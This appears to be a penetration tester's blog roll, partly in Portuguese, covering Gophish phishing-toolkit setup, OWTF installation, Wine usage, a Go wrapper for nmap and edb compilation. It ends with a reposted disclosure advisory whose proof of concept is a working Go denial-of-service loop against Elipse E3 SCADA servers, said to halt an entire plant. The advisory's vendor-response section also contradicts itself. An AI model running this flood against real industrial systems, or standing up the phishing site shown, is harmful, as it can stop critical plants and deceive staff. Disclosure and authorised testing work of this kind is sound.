Gophish – Golang Open-Source Phishing Toolkit

Gophish – Golang Open-Source Phishing Toolkit

Environment
Fedora 23 x86_64

Database
sqlite3

Git clone
https://github.com/gophish/gophish.git

adicitional packages install
go get github.com/gophish/gophish/config
go get bitbucket.org/liamstask/goose/lib/goose
go get github.com/PuerkitoBio/goquery
go get github.com/gorilla/context
go get github.com/gorilla/mux
go get github.com/gorilla/securecookie
go get github.com/jinzhu/gorm
go get github.com/jordan-wright/email
go get github.com/justinas/nosurf
go get github.com/oschwald/maxminddb-golang
go get golang.org/x/crypto/bcrypt
go get github.com/gorilla/sessions
go get github.com/gorilla/handlers

compile
go build gophish.go
./gophish

Interface Admin
http://127.0.0.1:3333/login

SiteFake and Phishing
http://0.0.0.0:80/

Screenshots

Gophish-Login

 

Selection_012

 

 

 

 

 

Selection_013

 

 

 

 

 

Selection_014

 

 

 

 

 

Selection_015

 

 

 

 

 

Selection_016

 

 

 

 

 

Selection_017

 

 

 

 

 

 

Selection_018

 

 

 

 

 

 

 

 

Happy Pentesting!

@firebitsbr

OWTF on KALI 2.0

1. Install KALI 2
2. Upgrade to KALI 2.0
3. cd /opt
4. git clone -b lions_2014 https://github.com/owtf/owtf.git
5. cd /opt/owtf/install
6. chmod u+x install.py
7. pip install cffi –upgrade
8. pip install –upgrade -r /opt/owtf/install/owtf.pip
9. pip install –upgrade beautifulsoup4 lxml Markdown psycopg2 pycurl six
10. ./install.py
11. cd /opt/owtf/profiles/general
12. In default_backtrack.cfg and default.cfg, change value of TOOL_METASPLOIT_DIR to reflect Metasploit installation directory to the correct one which is /usr/share/metasploit-framework/

@firebitsbr

Como executar um binário do Windows/DOS no Linux (Continuação do Post anterior sobre compilar binário de Windows, dentro do Linux)

Continuação do post:

https://firebitsbr.wordpress.com/2015/08/31/cross-compiling-de-arquivo-em-linguagem-c-compilando-em-linux-executando-em-windows/

Para testar seu binário de Windows, no próprio Linux, com se fosse um Windows…rss:) (Wine tá bugado na VM de testes).

[test@localhost sampler]$ wine cmd
fixme:winediag:start_process Wine Staging 1.7.49 is a testing version containing experimental patches.
fixme:winediag:start_process Please report bugs at http://bugs.wine-staging.com (instead of winehq.org).
Microsoft Windows 5.2.3790 (1.7.49)

Z:\home\test\sampler>fixme:ole:RemUnknown_QueryInterface No interface for iid {00000019-0000-0000-c000-000000000046}
Z:\home\test\sampler>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\test\sampler

8/31/2015 1:49 PM <DIR> .
8/31/2015 1:45 PM <DIR> ..
8/31/2015 1:15 PM 103 HelloWorld.c
8/31/2015 1:27 PM 67,385 HelloWorld.exe
8/31/2015 10:19 AM 717 HelloWorldCPL.c
8/31/2015 1:35 PM 67,385 HelloWorldCPL01
8/31/2015 1:15 PM 103 HelloWorldCPL01.c
8/31/2015 1:35 PM 67,385 HelloWorldCPL01.cpl
6 files 203,078 bytes
2 directories 95,160,651,776 bytes free
Z:\home\test\sampler>HelloWorldHelloWorld.exe
Sampler Test!

Não adiantar usar comandos de Linux, agora você estará no Windows

Z:\home\test\sampler>clear
Can’t recognize ‘clear’ as an internal or external command, or batch script.

Z:\home\test\sampler>exit
[test@localhost sampler]$ clear

Espero ter ajudado!

@firebitsbr

Running nmap via golang

Hi. Another post about golang 😉

I was developing a small source code in golang to automate the use of nmap , based on these examples:

https://github.com/mmcgrana/gobyexample/blob/master/examples/spawning-processes/spawning-processes.go
https://gobyexample.com/spawning-processes

But it was not succeed until I developed it and it worked :

[root@localhost golang]# vim go-nmap.go

// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// example os/exec nmap
// 24.07.2015 15:04:23
// fedora 22 x86-64
// go version go1.4.2 linux/amd64
// go build

package main

import “syscall”
import “os”
import “os/exec”

func main() {

// For our example we’ll exec `ls`. Go requires an
// absolute path to the binary we want to execute, so
// we’ll use `exec.LookPath` to find it (probably
// `/bin/nmap`).

binary, lookErr := exec.LookPath(“/usr/bin/nmap”)
if lookErr != nil {
panic(lookErr)
}

// `Exec` requires arguments in slice form (as
// apposed to one big string). We’ll give `ls` a few
// common arguments. Note that the first argument should
// be the program name.
// args := []string{“nmap”, “-A”, “-O”, “127.0.0.1”}
args := []string{“nmap”, “-A”, “127.0.0.1”}

// `Exec` also needs a set of [environment variables](environment-variables)
// to use. Here we just provide our current
// environment.
env := os.Environ()

// Here’s the actual `syscall.Exec` call. If this call is
// successful, the execution of our process will end
// here and be replaced by the `/bin/ls -a -l -h`
// process. If there is an error we’ll get a return
// value.
execErr := syscall.Exec(binary, args, env)
if execErr != nil {
panic(execErr)
}
}

I installed a vm with Fedora 22 x86_64 and CUPS server and did a spot scanning in localhost 127.0.0.1

[root@localhost golang]# go build go-nmap.go
[root@localhost golang]# ./go-nmap

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-24 15:06 BRT
Nmap scan report for localhost.localdomain (127.0.0.1)
Host is up (0.00015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
631/tcp open ipp CUPS 2.0
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home – CUPS 2.0.3
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 – 3.15
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

So it works!

@firebitsbr

Compilando debugger edb (visual debugger open source) no fedora 20 x86-64

Segue:

dependências pré-reqs para instalação:
yum install qt qt-config qt-devel -y

baixando os sources codes:
wget http://codef00.com/projects/debugger-0.9.20.tgz

extraindo:
tar -xvvf debugger-0.9.20.tgz

compilando  e instalando:
cd debugger/
qmake-qt4
make
make install

executando o debbuger
edb

screenshoot:

f20x86_64-devel-edb

f20x86_64-devel-edb-lightdm

referências:

http://codef00.com/projects
http://www.mentebinaria.com.br/artigos/0x1f/0x1f-maqengrevlnx.html

@firebitsbr

VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC. From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests authorized by the customer, we can stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is a proprietary software.
The E3 is a system of supervision and control processes designed to meet
the current requirements of connectivity, flexibility and reliability,
making it ideal for use in critical systems (SCADA PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities by
‘index.html’ page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
“fmt”
“io/ioutil”
“log”
“net/http”
)

func main() {
count := 1
// fmt.Println (“”)
// fmt.Println (” _____.__ ___. .__ __ “)
// fmt.Println (” _/ ____\__|______ ____\_ |__ |__|/ |_ ______ “)
// fmt.Println (” \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ “)
// fmt.Println (” | | | || | \/\ ___/| \_\ \ || | \___ \ “)
// fmt.Println (” |__| |__||__| \___ >___ /__||__| /____ > “)
// fmt.Println (” \/ \/ \/ “)
// fmt.Println (” bits on fire. “)
fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3”)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42”)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections per second”)

for {
count += count
//set ip http://192.168.0.1:1681/index.html ->
// Elipse 3 http://

fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3”)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42”)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections”)

fmt.Println (“Connected Port 1681…Testing”)
fmt.Println (“Counter Loops: “, count)

res, err := http.Get(“http://192.168.0.1:1681/index.html&#8221;;)
if err != nil {
log.Fatal(err)
}
robots, err := ioutil.ReadAll(res.Body)
res.Body.Close()
if err != nil {
log.Fatal(err)
}
fmt.Printf(“%s”, robots)
}
}

Crash 20 Requests Paralels

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

“We would be possible for us to communicate the details of the test, so
we can arrange a hotfix.”

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
No official fix for these issues will be released for the Elipse.
However, administrators can mitigate these issues defining rules within
a web application firewall (WAF) solution.

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr